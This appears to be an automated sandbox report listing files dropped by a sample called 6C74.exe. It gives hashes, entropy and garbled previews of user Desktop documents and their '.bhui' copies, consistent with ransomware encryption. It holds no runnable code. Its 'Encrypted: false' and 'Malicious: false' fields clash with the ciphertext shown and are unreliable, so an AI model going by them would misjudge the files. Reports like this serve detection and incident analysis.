Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.86680842186028
Encrypted:	false
SSDEEP:	24:CuY/4rZb2ZKqkX1VNRYUq+jTwODX9Gd0OabQ1F6zfKf4zay0/3Wf4mceAWbD:XYoF2Uqen5q+hL94abQz6zyftCce1D
MD5:	A7D7501FB945BA25FB0F00120A8EA810
SHA1:	E5BE9C34106E212B5DA84688C4A7398BAA81099D
SHA-256:	A610B7DBB11F5A6C74015852B77F4CEAC5C8D2FBA753F898DE5EBE55E334B8C4
SHA-512:	2DB18A1A272433718D5CF3E8E6A11E5BC13010A1AF0245E40E31ADDC997C4E1FE697A6FD8E9263CAD659FED17271F812829B9B0935B77AD18593ABBE4311A0DA
Malicious:	false
Reputation:	unknown
Preview:	SNIPGW]W.(.S..p.....L......J\).b.....]y-.5..f[C.`..H...7.A...k...."....f.1.=..(zx.[D..../...Tx.../?.....y@ ..d...M..p.Z..r.Us..#..n........R.....d./..^we2...i.).......b...#f>.@.f....m.l..6rK6P&....=.i..w"R3\?.>.B......#..;..X.u;......;...mJ.`:s8..}O.q&......^..........n.i.)....}.F....:.m%..q....Uf.\|.....#..^...%.8{[.^..LT%.F..)b!.+..Gr...s2.W.%..NY....[sH.M......=..l.1e..Jz...U..M..K...,.......UJ9.~...1C....V..s.r&z..)yC.IjY....p.8.mp.......H.F@....b..k..;.M.[...%..k.....".sU.8e.;...a.-.&....._....m..D..1,.....l..G..Q>..W.......6.H.BhV.QW.{a..J18...BVT../U.N.....b..7I..h:.m..vGu....X....../..l.f.q<.m...o.w...na.a..0'tk...t8.7M.R..[r.U.S...M....GBu..Y..8n...(../t...B..w.....\|8H.E..u...?>.l._.7.}..T.HM..}}h.-..._..E...Bgc.r-.(..2!k5T+.&W..:.(.......=~Gw&.S...S.f>F.iz....d^..&].1..._.....P.\|..&q.-..q..q.\|.l.B..v.{H<...O....O.5....'...d....e. 8...PX...Q{.....6...6...wH..K.W....iI.w.."...d...F....j.x#.V..5y....g..M.e.$?..z.)(.,g...p...U./x..

C:\Users\user\Desktop\VWDFPKGDUF.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.83993566330219
Encrypted:	false
SSDEEP:	24:F1SxBkV1lehOYh7S9HobL9/TJoHbc2JdMUMDrGW/fut4RP5qWWbD:F1SxBkzl3YU2rJYiUMDrGu+4RPYD
MD5:	26968769BF00DBA27065E11683C0EA1C
SHA1:	40E37752FBE09669B29797A052ACB113D925230A
SHA-256:	B815E8D43613EBE14DB75C435DCF72C5B0BE973C02CC0787797A985CCB755F49
SHA-512:	9876FE89B252E8E78C5BE7FD2F8437E87F000BB7CA0696FD5D13A5C17E5F65023E38E8BBB6100260C53080BE640A419AC6D3C81BE2B03DDB8E5497768269BC2C
Malicious:	false
Reputation:	unknown
Preview:	VWDFP.3..h..to.;.U...c..=.........?..xa...._.ofs..po...VP..?..1.~B....}.o...^_.7g.,@k.o.N.......a..0.I.x.[...ViG.. t)...f".r.7.{.i}.E.a.........t...J_....d..B........$...G.J........B.......8.....,:9.D.e/A.#a..40..{....e..R........5EU...G3...]zx}....Z...i'.............i(u..D2.z/..8....~.1.2.-m..r3.Z9... .'.PU2......P.5;.M...y9...._....o.O...+I..[.>...E.y...p\|....\.0.R...A}.I..{K..H.E...7.....3j....6.1........j..Y.W...7.~'"......).....WZ.6}....Q...0.g.{.....).\9Y.Go=p..Tg..m.J...j.....W]bx..f.q.gs.9.%:...^..,p..v.`..@:R....xy~...F............!<.....4%...'....\|P..../j.)'......5;F.XG.[.............5.....`..`GZ..:...\|...J.........5.&'y....._.x..dx].p....X..W.L.\|]=.'mz.F.. ......m._Xr%8.".t......n.b..uxf..g........(.d?......p..@}....;...<.o...._...nzNX.H+......\|.dW..m...m.R{..K.o......w...>O....j.v.mM..D.......i.`......@.nO..._....7r6.P.{.).`<.~.C......S....4...CN{D..]./p.\|.JP.B./Fbs..=~..=%G.0.D.Y.E..z..V#>..........KE..>.N.9..v...]....

C:\Users\user\Desktop\VWDFPKGDUF.jpg.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.83993566330219
Encrypted:	false
SSDEEP:	24:F1SxBkV1lehOYh7S9HobL9/TJoHbc2JdMUMDrGW/fut4RP5qWWbD:F1SxBkzl3YU2rJYiUMDrGu+4RPYD
MD5:	26968769BF00DBA27065E11683C0EA1C
SHA1:	40E37752FBE09669B29797A052ACB113D925230A
SHA-256:	B815E8D43613EBE14DB75C435DCF72C5B0BE973C02CC0787797A985CCB755F49
SHA-512:	9876FE89B252E8E78C5BE7FD2F8437E87F000BB7CA0696FD5D13A5C17E5F65023E38E8BBB6100260C53080BE640A419AC6D3C81BE2B03DDB8E5497768269BC2C
Malicious:	false
Reputation:	unknown
Preview:	VWDFP.3..h..to.;.U...c..=.........?..xa...._.ofs..po...VP..?..1.~B....}.o...^_.7g.,@k.o.N.......a..0.I.x.[...ViG.. t)...f".r.7.{.i}.E.a.........t...J_....d..B........$...G.J........B.......8.....,:9.D.e/A.#a..40..{....e..R........5EU...G3...]zx}....Z...i'.............i(u..D2.z/..8....~.1.2.-m..r3.Z9... .'.PU2......P.5;.M...y9...._....o.O...+I..[.>...E.y...p\|....\.0.R...A}.I..{K..H.E...7.....3j....6.1........j..Y.W...7.~'"......).....WZ.6}....Q...0.g.{.....).\9Y.Go=p..Tg..m.J...j.....W]bx..f.q.gs.9.%:...^..,p..v.`..@:R....xy~...F............!<.....4%...'....\|P..../j.)'......5;F.XG.[.............5.....`..`GZ..:...\|...J.........5.&'y....._.x..dx].p....X..W.L.\|]=.'mz.F.. ......m._Xr%8.".t......n.b..uxf..g........(.d?......p..@}....;...<.o...._...nzNX.H+......\|.dW..m...m.R{..K.o......w...>O....j.v.mM..D.......i.`......@.nO..._....7r6.P.{.).`<.~.C......S....4...CN{D..]./p.\|.JP.B./Fbs..=~..=%G.0.D.Y.E..z..V#>..........KE..>.N.9..v...]....

C:\Users\user\Desktop\VWDFPKGDUF.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858993792715962
Encrypted:	false
SSDEEP:	24:X47tKq0j49wZ8oJ/EWUbTI/tcx2aKcJjMcrh9o5WbD:U55aJsWUbTI/tQrNp7oGD
MD5:	051FFE5461A7B0D0A1748EF6DBD4848E
SHA1:	3C30013B8926E2B7E020F27FBD17ABB2AD5E7D5B
SHA-256:	D70E7E016AEA5A95B7FE3442247417172121A883722B871724F8E19D9E4665E3
SHA-512:	F6051E7B022F1338D7EB92CD5AE7D26898797F31BB84DB16FFD86250A7B8F2819873F14DE853EE7612A5317C7B7E9A10956D7C210AA112D3FA1FF12F7AEDD589
Malicious:	false
Reputation:	unknown
Preview:	VWDFPU+I..4.0.b<..3.$].>.t.~..e....w.....@fOF..i]......#Af...g......un.....~{...).LJJr...oU.z......UdA2._R.z.J.?p...y..Fc..+.x.\4-.\...D..t>V.........,O_.7.\..e0..]pv..............%....;4......W.OG...<\.}g..;.D...q`.K9........dP.....S..n...6`....@5...{um. H.V.z...1p[........;..Lb..FIGa..q..Y.8+.;..Z.)2..o.}.n......QU7i.V.t.r.....Wyu..=...D..t....8.ZI.~.......+...U.s..=.-.0&i..g...-....C...[K.*."....~t.d..{..b.....L.A...6.YI.....k...~....H.......[..t.....7.......%j.5T.....G.0Y.W....'.~.....(...D.y........tV.%K.....p...-?....i.....+/6..Z...%..TT...{.E.W-9.;.x.ZdD...g.k5...I.E\,.F.~.?.6i....X......bB....R-l.....co&..I.r....).....y.<Pp...R.Q.._H)....Z.F..a....:8...Z{...Gwy.$...u. ..#.2....w....z.....;'3..a..........h..<.~..._..5.M!..{q.....5.>.....9Fv:].md...i.!.......H./3.I..........."W......R...b"f..1q.Z...1...6.=..x..j@..bF@.._...[&........HL.#X.j.....@6...x....s..".._.q[...@.S..{-....\|..[..@.9J..-.u.... ..6fFw...C..k<...g..xB..[.&.fT..L

C:\Users\user\Desktop\VWDFPKGDUF.mp3.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858993792715962
Encrypted:	false
SSDEEP:	24:X47tKq0j49wZ8oJ/EWUbTI/tcx2aKcJjMcrh9o5WbD:U55aJsWUbTI/tQrNp7oGD
MD5:	051FFE5461A7B0D0A1748EF6DBD4848E
SHA1:	3C30013B8926E2B7E020F27FBD17ABB2AD5E7D5B
SHA-256:	D70E7E016AEA5A95B7FE3442247417172121A883722B871724F8E19D9E4665E3
SHA-512:	F6051E7B022F1338D7EB92CD5AE7D26898797F31BB84DB16FFD86250A7B8F2819873F14DE853EE7612A5317C7B7E9A10956D7C210AA112D3FA1FF12F7AEDD589
Malicious:	false
Reputation:	unknown
Preview:	VWDFPU+I..4.0.b<..3.$].>.t.~..e....w.....@fOF..i]......#Af...g......un.....~{...).LJJr...oU.z......UdA2._R.z.J.?p...y..Fc..+.x.\4-.\...D..t>V.........,O_.7.\..e0..]pv..............%....;4......W.OG...<\.}g..;.D...q`.K9........dP.....S..n...6`....@5...{um. H.V.z...1p[........;..Lb..FIGa..q..Y.8+.;..Z.)2..o.}.n......QU7i.V.t.r.....Wyu..=...D..t....8.ZI.~.......+...U.s..=.-.0&i..g...-....C...[K.*."....~t.d..{..b.....L.A...6.YI.....k...~....H.......[..t.....7.......%j.5T.....G.0Y.W....'.~.....(...D.y........tV.%K.....p...-?....i.....+/6..Z...%..TT...{.E.W-9.;.x.ZdD...g.k5...I.E\,.F.~.?.6i....X......bB....R-l.....co&..I.r....).....y.<Pp...R.Q.._H)....Z.F..a....:8...Z{...Gwy.$...u. ..#.2....w....z.....;'3..a..........h..<.~..._..5.M!..{q.....5.>.....9Fv:].md...i.!.......H./3.I..........."W......R...b"f..1q.Z...1...6.=..x..j@..bF@.._...[&........HL.#X.j.....@6...x....s..".._.q[...@.S..{-....\|..[..@.9J..-.u.... ..6fFw...C..k<...g..xB..[.&.fT..L

C:\Users\user\Desktop\VWDFPKGDUF.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8655851425447185
Encrypted:	false
SSDEEP:	24:txuHEPJVhMdPVIbqRLK+FGfGU6RYWE9LTmXx2RVhrMCDhuxWowqYDW+eeKnNDeWX:tx7LhMPRLhRuLTkxiXrfw70DeeCXD
MD5:	E1F83635D9B2441CD78FE681CBCB6E61
SHA1:	792DA10AB506AEF7E15C504480BFF3B0FC210D03
SHA-256:	C369E9DD880937D8E64C4902E1DD2796F672D858EB08C7E995C4BEDF2B6A30F8
SHA-512:	99DED0076FDFAE3779806F08DF9F9A2AE2F5519720CC3231676FBB3626E1821B9C367370F08A4F9074F0B430B83174EC19E203C2AFA7B6EC7233BF787B01AFF8
Malicious:	false
Reputation:	unknown
Preview:	VWDFP4.0 .K..Q:G.......$Y...0{....".>c......oA...c.Pd...@..y.&S...#...Ok.Y(.:...a....a..6eC....f..7oi.P.2.$h.oC\|Tm..i.a].......?.......TZ..._k.Bi..Q....\|....=]S..n.!.A..}.......h7hF....ac..L....mC.7...[......z.!..`.....}../4:..W<#.....r.I..:...@...".OA.........2.x,.}..5v.-N...?Mp#<..`............N...L.....L............).....x...H..f.r...(.Sd5..5u,3H.3c....AE...H..2...=...,.@.e..... _\...2..X.w.....e....XL.....L..E.N...........\/w..'..?...g..Q.u...%.Z.....k.%.6..3...b...\|...T$.c.FC:..X.^..h.V."4.2v.)....+gjk.....h....c.Q.fZX.._........"#~...@$%.l.b L.&.E.N..x...L..!..A.".9..q....:..v.b.w.wJ..8ZZ..[%@ >...@.5..j>e.}f.N^..i...f.u..D...6._.f....)h&@...5..D.ML..]..o.-.J..Vtl.']Ca.....+.Z.XK...\w....RS.P..&bH..u(.u...!..kH...f{.. .R....C....g]..Aj.Q:.I3c...P....,f..6K.#.....3..L.{]...=.(8...N.(Mv........x...'];...n.HjF.U.......:..L;FMd..yF#2...\..p....I..f..>....7\|..].%.7.H....:.5z.z......g#S.9....l#.5?s...9.V..].H.."-#...{;.=.$...9

C:\Users\user\Desktop\VWDFPKGDUF.pdf.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8655851425447185
Encrypted:	false
SSDEEP:	24:txuHEPJVhMdPVIbqRLK+FGfGU6RYWE9LTmXx2RVhrMCDhuxWowqYDW+eeKnNDeWX:tx7LhMPRLhRuLTkxiXrfw70DeeCXD
MD5:	E1F83635D9B2441CD78FE681CBCB6E61
SHA1:	792DA10AB506AEF7E15C504480BFF3B0FC210D03
SHA-256:	C369E9DD880937D8E64C4902E1DD2796F672D858EB08C7E995C4BEDF2B6A30F8
SHA-512:	99DED0076FDFAE3779806F08DF9F9A2AE2F5519720CC3231676FBB3626E1821B9C367370F08A4F9074F0B430B83174EC19E203C2AFA7B6EC7233BF787B01AFF8
Malicious:	false
Reputation:	unknown
Preview:	VWDFP4.0 .K..Q:G.......$Y...0{....".>c......oA...c.Pd...@..y.&S...#...Ok.Y(.:...a....a..6eC....f..7oi.P.2.$h.oC\|Tm..i.a].......?.......TZ..._k.Bi..Q....\|....=]S..n.!.A..}.......h7hF....ac..L....mC.7...[......z.!..`.....}../4:..W<#.....r.I..:...@...".OA.........2.x,.}..5v.-N...?Mp#<..`............N...L.....L............).....x...H..f.r...(.Sd5..5u,3H.3c....AE...H..2...=...,.@.e..... _\...2..X.w.....e....XL.....L..E.N...........\/w..'..?...g..Q.u...%.Z.....k.%.6..3...b...\|...T$.c.FC:..X.^..h.V."4.2v.)....+gjk.....h....c.Q.fZX.._........"#~...@$%.l.b L.&.E.N..x...L..!..A.".9..q....:..v.b.w.wJ..8ZZ..[%@ >...@.5..j>e.}f.N^..i...f.u..D...6._.f....)h&@...5..D.ML..]..o.-.J..Vtl.']Ca.....+.Z.XK...\w....RS.P..&bH..u(.u...!..kH...f{.. .R....C....g]..Aj.Q:.I3c...P....,f..6K.#.....3..L.{]...=.(8...N.(Mv........x...'];...n.HjF.U.......:..L;FMd..yF#2...\..p....I..f..>....7\|..].%.7.H....:.5z.z......g#S.9....l#.5?s...9.V..].H.."-#...{;.=.$...9

C:\Users\user\Desktop\ZIPXYXWIOY.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860715766614891
Encrypted:	false
SSDEEP:	24:R9ATyhC+ryXffNKDwqvAkN3HJqp/ecvixetm2TXyULIvmaEiwLd1SYeWbD:zATyhtryXf9qvLN3JqM/xetmycvmlnxn
MD5:	F8B10BE7D0E58D78218F3277D69E57E2
SHA1:	32B097AFE67723A45A047CBB1D688EEE5D7904A5
SHA-256:	5273434410A917E499EC68FBE376281ECFA2362870573AAA3D5CE474EE5BFA6C
SHA-512:	034449296FEE4DA165A22587A6A6F34E67DC06F2C5D72B0E1F5E9E4BCD6E496AEC6071B94438B45DC07AC71254FDC31BDD4FC76F89A8CA156DC7B5531463698F
Malicious:	false
Reputation:	unknown
Preview:	ZIPXYv....(......"=I..{...PVZTP.I..T_,.:.$R.....A#>..,....Hu......X..1..m.Y7.'..9.."a{.[.3...\|.45....,;wA.......@....p..5\|"...n..m..c......w.d..p..1...F..h.^Q.D...r...c...h..We.....r.FQO..j.P..6.l.........D..e.....x.w24...&.2.".{\|....pWx...Q.~.oo}........b...F.....8z..........@/...R~...\.fmcth.x...n..u...s...;... .O....n...9$.A..d.B:..aH.~...v..J.T...pI.q...X...x.n........`.....^...\G..mG.%..3H#.X..C...#.o&.8Y@...Y.;...ZL.#.. _...7bB.R%RD...........Ku....:....F7.O5.X6....q.....fp.Re.t.Zc......\|.RR/.\...K]Iy...M.?W...+."kL;.z..............W.q!!.0.S.....d.,C..P.R... ...J.e~..V..O.T.dD.6}..&.v...25..%..>..o....6.I...h.....p......U....0...)R..L...8..........'.eX..Fv......#..7..?sG..$k&.........1.".........\|.i...Fg+g7..6N....n.O..-.B^.l.....3...)..r....G..._"z..hl..^.yYQ.,"N..s.V3............r.P."...6.*N..._H\q.r[9)...-...U..>......_....n.!G.Nx.J..J...$.J..x{..[.s...4.Hc.,<...C.b...Z..m...L.T.G.p...J9.3....s.+U.n$.

C:\Users\user\Desktop\ZIPXYXWIOY.docx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860715766614891
Encrypted:	false
SSDEEP:	24:R9ATyhC+ryXffNKDwqvAkN3HJqp/ecvixetm2TXyULIvmaEiwLd1SYeWbD:zATyhtryXf9qvLN3JqM/xetmycvmlnxn
MD5:	F8B10BE7D0E58D78218F3277D69E57E2
SHA1:	32B097AFE67723A45A047CBB1D688EEE5D7904A5
SHA-256:	5273434410A917E499EC68FBE376281ECFA2362870573AAA3D5CE474EE5BFA6C
SHA-512:	034449296FEE4DA165A22587A6A6F34E67DC06F2C5D72B0E1F5E9E4BCD6E496AEC6071B94438B45DC07AC71254FDC31BDD4FC76F89A8CA156DC7B5531463698F
Malicious:	false
Reputation:	unknown
Preview:	ZIPXYv....(......"=I..{...PVZTP.I..T_,.:.$R.....A#>..,....Hu......X..1..m.Y7.'..9.."a{.[.3...\|.45....,;wA.......@....p..5\|"...n..m..c......w.d..p..1...F..h.^Q.D...r...c...h..We.....r.FQO..j.P..6.l.........D..e.....x.w24...&.2.".{\|....pWx...Q.~.oo}........b...F.....8z..........@/...R~...\.fmcth.x...n..u...s...;... .O....n...9$.A..d.B:..aH.~...v..J.T...pI.q...X...x.n........`.....^...\G..mG.%..3H#.X..C...#.o&.8Y@...Y.;...ZL.#.. _...7bB.R%RD...........Ku....:....F7.O5.X6....q.....fp.Re.t.Zc......\|.RR/.\...K]Iy...M.?W...+."kL;.z..............W.q!!.0.S.....d.,C..P.R... ...J.e~..V..O.T.dD.6}..&.v...25..%..>..o....6.I...h.....p......U....0...)R..L...8..........'.eX..Fv......#..7..?sG..$k&.........1.".........\|.i...Fg+g7..6N....n.O..-.B^.l.....3...)..r....G..._"z..hl..^.yYQ.,"N..s.V3............r.P."...6.*N..._H\q.r[9)...-...U..>......_....n.!G.Nx.J..J...$.J..x{..[.s...4.Hc.,<...C.b...Z..m...L.T.G.p...J9.3....s.+U.n$.

C:\Users\user\Desktop\ZIPXYXWIOY.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843439418136718
Encrypted:	false
SSDEEP:	24:Rl0Op+HLA11WaaheP+aslOTRc+LMLVkPnk+CDvyrlqDVdgy1mfl5e8VkyYf2hgJY:XSa1xatOSligvMC0ls8VDYf2hgcRZU/k
MD5:	D813A4A90C13E160E2F9AB1D98942D03
SHA1:	63107548ABEA38FF93C414D8E41719DA57CB58D4
SHA-256:	C1FEA6522E2536297CF30F73F769B785921A999D7783D405454DC936EC28A906
SHA-512:	20F6D403F637964FCB2F9A715C4BC17CEA2A5C46D4869F7AFEB2555469371DBD1136320CB99D8731A119DEE1444F688BB61C83AEAE18B5712ECE6B2DD50A3DD2
Malicious:	false
Reputation:	unknown
Preview:	ZIPXY..JE.....f.....D<....:5.....R.4P73A#.h.......\.0u._......dE.^.5gg.B...p.;..4.....c.3.."...Hf...$..Q.J..y....T.s.g....cOWh.\|..K.....e.7i$...C...8..W.....Pv.N.g..j#.Xm.._.a.OP........Jj......6=..:k\d......k..M.&...=7..4.K.t.....lF..........:9s.aDY.tD....6...Ld..w.\......!.<._.z..n.....+.^.$..[..Z..E..b.......^...8.=..4...K...5.$4~,."w)vZ....f...t.M."....B.9+......<....>S...8.....7.B....}]...i..t....2.t.T.<......8.....1...A.T.G..x.?W...VX.WnQ..o.......g...7.=6..^...KEx.i.B.....t.3....^..?.......zEP.5..MS.Q:XN....6..iI...$....::...x.z ]....quZ...&5}f.)O+.t`....G.._..67Wb....,.lKL.8.m.+........f..p..e.(.....E.<Se..!..j.;.S...C..]'.<........}V)7.Uc.k..4'...I...z.L.....M.....u=.Y%`....'..Spx...=..].............2@F.q.....tQ..T.....)......z...4...d.F..o9....~...80...D..~2..;!N.4?^d.....Ak3..;WY...j...Y...5...dy..........EG._.=..E>.:.p.._6.....3..,t...@...\!....V^.r.L....?2...d.Gs.U..+.........<r.;TwN...m...Z4...O...w"....3.*t.&.N[..l.J.T

C:\Users\user\Desktop\ZIPXYXWIOY.pdf.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843439418136718
Encrypted:	false
SSDEEP:	24:Rl0Op+HLA11WaaheP+aslOTRc+LMLVkPnk+CDvyrlqDVdgy1mfl5e8VkyYf2hgJY:XSa1xatOSligvMC0ls8VDYf2hgcRZU/k
MD5:	D813A4A90C13E160E2F9AB1D98942D03
SHA1:	63107548ABEA38FF93C414D8E41719DA57CB58D4
SHA-256:	C1FEA6522E2536297CF30F73F769B785921A999D7783D405454DC936EC28A906
SHA-512:	20F6D403F637964FCB2F9A715C4BC17CEA2A5C46D4869F7AFEB2555469371DBD1136320CB99D8731A119DEE1444F688BB61C83AEAE18B5712ECE6B2DD50A3DD2
Malicious:	false
Reputation:	unknown
Preview:	ZIPXY..JE.....f.....D<....:5.....R.4P73A#.h.......\.0u._......dE.^.5gg.B...p.;..4.....c.3.."...Hf...$..Q.J..y....T.s.g....cOWh.\|..K.....e.7i$...C...8..W.....Pv.N.g..j#.Xm.._.a.OP........Jj......6=..:k\d......k..M.&...=7..4.K.t.....lF..........:9s.aDY.tD....6...Ld..w.\......!.<._.z..n.....+.^.$..[..Z..E..b.......^...8.=..4...K...5.$4~,."w)vZ....f...t.M."....B.9+......<....>S...8.....7.B....}]...i..t....2.t.T.<......8.....1...A.T.G..x.?W...VX.WnQ..o.......g...7.=6..^...KEx.i.B.....t.3....^..?.......zEP.5..MS.Q:XN....6..iI...$....::...x.z ]....quZ...&5}f.)O+.t`....G.._..67Wb....,.lKL.8.m.+........f..p..e.(.....E.<Se..!..j.;.S...C..]'.<........}V)7.Uc.k..4'...I...z.L.....M.....u=.Y%`....'..Spx...=..].............2@F.q.....tQ..T.....)......z...4...d.F..o9....~...80...D..~2..;!N.4?^d.....Ak3..;WY...j...Y...5...dy..........EG._.=..E>.:.p.._6.....3..,t...@...\!....V^.r.L....?2...d.Gs.U..+.........<r.;TwN...m...Z4...O...w"....3.*t.&.N[..l.J.T

C:\Users\user\Desktop\ZIPXYXWIOY\GLTYDMDUST.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843774308553801
Encrypted:	false
SSDEEP:	24:v2hCgpXN7losc3V0UDPx4UnWQqwhRVqsE1UJL5QN5JHXHKAC3lCWsM5JVPWbD:v8fXN6V0UV4/QZZ4NbXHKAC3l5sIeD
MD5:	820A6A0B8A1BC43D30CEEB5B69FBFF34
SHA1:	45D886D4E1CE76198A4F6DAE419A4DF837E062FF
SHA-256:	7024DD4F691FB4AA43A557E3FA9FE70A9E1B43772AFC683797A147F6E347F7D1
SHA-512:	472A09D1E3DF64AEDF58A9A119B4F8D29844CE5E91763D44C0B19BC4B114EC43EAC4A123769C896480CAE2F2E7C7DF53BA981D8B2832248D137101302798A9C4
Malicious:	false
Reputation:	unknown
Preview:	GLTYD..F.a..Y........f.(..<.B\.....7o..%../..Z...)q_P7Zc...;..5..7....c.s..3........I.;.l..,^.....h.4...f.>..n..t.........u.+.b......K[...W.?R...A..+M..l....W.5......>...+..5..D.6.X._\=.L(....E....P..EJ5.....]...U...7k../}.e....:..r..M............?>..@......0..O'...a!..J..?H2/\.. ..4s..&..$>..#........`.N.L......./.d..#.^.z..6=x..#.r.r.......4@870.P.$..m.A.n.3DBVED...9..JV.l.k.`]...]~..]\.....+..L..K.Z........R.-eAzuI...q....L.$..!]..........l......![...n.:t.K...n.r\...D.y..`.b.:....7.!.A3.....e..k...I...v...D...>....}._.!.Y.} 1V....{+..;.)h..}.^.A....!3D.\|...]_{...rL..@..'#./b".P .<f.za.Neg6.....<`...i<..D.eH..3.A...\.oq.r[.)+Y..\.q......B1i....$k.8..!........n.../..WOo.ZX....&..#.....ZstY.ZwP...U.T.1....e..8..'l.O.%;..I..;\|.i\|....,..x.{H..BQT.0.9.(.5........yO..q]..._EQ...!..u..;.PNa>.E.}.W.4\....3.........r...;...O.zN3.f)..9...U.zu....<.?.h_Am.U.wQ.4;.;...~:..,...P.1.....k......=..\.+^lvB.m...{....../.9e..]i.u..6j.M)`..5[..&.Q.C....

C:\Users\user\Desktop\ZIPXYXWIOY\GLTYDMDUST.xlsx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843774308553801
Encrypted:	false
SSDEEP:	24:v2hCgpXN7losc3V0UDPx4UnWQqwhRVqsE1UJL5QN5JHXHKAC3lCWsM5JVPWbD:v8fXN6V0UV4/QZZ4NbXHKAC3l5sIeD
MD5:	820A6A0B8A1BC43D30CEEB5B69FBFF34
SHA1:	45D886D4E1CE76198A4F6DAE419A4DF837E062FF
SHA-256:	7024DD4F691FB4AA43A557E3FA9FE70A9E1B43772AFC683797A147F6E347F7D1
SHA-512:	472A09D1E3DF64AEDF58A9A119B4F8D29844CE5E91763D44C0B19BC4B114EC43EAC4A123769C896480CAE2F2E7C7DF53BA981D8B2832248D137101302798A9C4
Malicious:	false
Reputation:	unknown
Preview:	GLTYD..F.a..Y........f.(..<.B\.....7o..%../..Z...)q_P7Zc...;..5..7....c.s..3........I.;.l..,^.....h.4...f.>..n..t.........u.+.b......K[...W.?R...A..+M..l....W.5......>...+..5..D.6.X._\=.L(....E....P..EJ5.....]...U...7k../}.e....:..r..M............?>..@......0..O'...a!..J..?H2/\.. ..4s..&..$>..#........`.N.L......./.d..#.^.z..6=x..#.r.r.......4@870.P.$..m.A.n.3DBVED...9..JV.l.k.`]...]~..]\.....+..L..K.Z........R.-eAzuI...q....L.$..!]..........l......![...n.:t.K...n.r\...D.y..`.b.:....7.!.A3.....e..k...I...v...D...>....}._.!.Y.} 1V....{+..;.)h..}.^.A....!3D.\|...]_{...rL..@..'#./b".P .<f.za.Neg6.....<`...i<..D.eH..3.A...\.oq.r[.)+Y..\.q......B1i....$k.8..!........n.../..WOo.ZX....&..#.....ZstY.ZwP...U.T.1....e..8..'l.O.%;..I..;\|.i\|....,..x.{H..BQT.0.9.(.5........yO..q]..._EQ...!..u..;.PNa>.E.}.W.4\....3.........r...;...O.zN3.f)..9...U.zu....<.?.h_Am.U.wQ.4;.;...~:..,...P.1.....k......=..\.+^lvB.m...{....../.9e..]i.u..6j.M)`..5[..&.Q.C....

C:\Users\user\Desktop\ZIPXYXWIOY\LHEPQPGEWF.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.871126617664268
Encrypted:	false
SSDEEP:	24:94dRVxPI71xps/AWv85aeGUTEsQubElvHg6abDSJUm+uHNCDtdo2oK2VuU9uFZKR:94dVoiYWk9bQubEJ7MDSWmxIRhoVACuG
MD5:	C263ADA4D9CCF26F8B51889DC8654BFC
SHA1:	B4C359EC6D9EE934722EDDA678003FC589ECB911
SHA-256:	34023E92788F16853F7AD7D0676B80FA95AF8FE3541F6933344B6C944C5C9EA2
SHA-512:	BA8447F34C2A566187AD897479ABC477079C19CC3CFE8A9158B5E3A7738607747BD446684C3F4DE62BE6BFB7DE71FA063C77B009564E19B325E24C4F84942F9B
Malicious:	false
Reputation:	unknown
Preview:	LHEPQ....5...'...Ai.-..t-..I....rM.6DF..q..`.&..#....a..jS..8{..G,.W.w.B.~.c/(UK.......g.ziX..uS.Qa...c........A...@..{.s.....%.v,..t....IC.eV..B..:...F.... c^....$.%.N.$.6.....,.^....5..j1..[........6jK.......1...#..;./......y.2...\|...;C.r...v+....&.PX..`_.n.+.}._./.a....f.b.Q.1g...k..0...y....E.].b.....].}F..aj.E...b......U......YY!..i.k.H8A..D%}#./.)E....?P.R0..x.fK.....mkx[.8.)..Z..>.!\..........!~...9A.O.......6I........2=.O.+.\Z.H..;....^...6..r.@.U.s.W.!:.........g.j...[.R).0.....;.C..p~.Z.(.b.4X.E9...<./..4.q..u.'......R...L....%.b}@.....u5.'...r....c...s.MU0.2lOR..........B.Mjg.A.hoT{.j.Up..v.a..2.-.`.......P>..]D....Y.Rn.yt...I'....) .....sf..C.r.K..H.<..k..H...8d.E.B.'.q.......:..9!.N..{~T.5..v$V..B.t!.....y.#..BS.Z@.)p.{..(.%...........B-i......^QA.......;..j..{..F&....;.r..d.......\|.=..4..2._....h..I.{...b..m)I.@E..-.D...J... H+J!.c........#{`9..-d..JZ.g..u.F...yo.....D..KVQ...U......O......{..9(,`bkVYg....%(.v.^.E..8..

C:\Users\user\Desktop\ZIPXYXWIOY\LHEPQPGEWF.mp3.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.871126617664268
Encrypted:	false
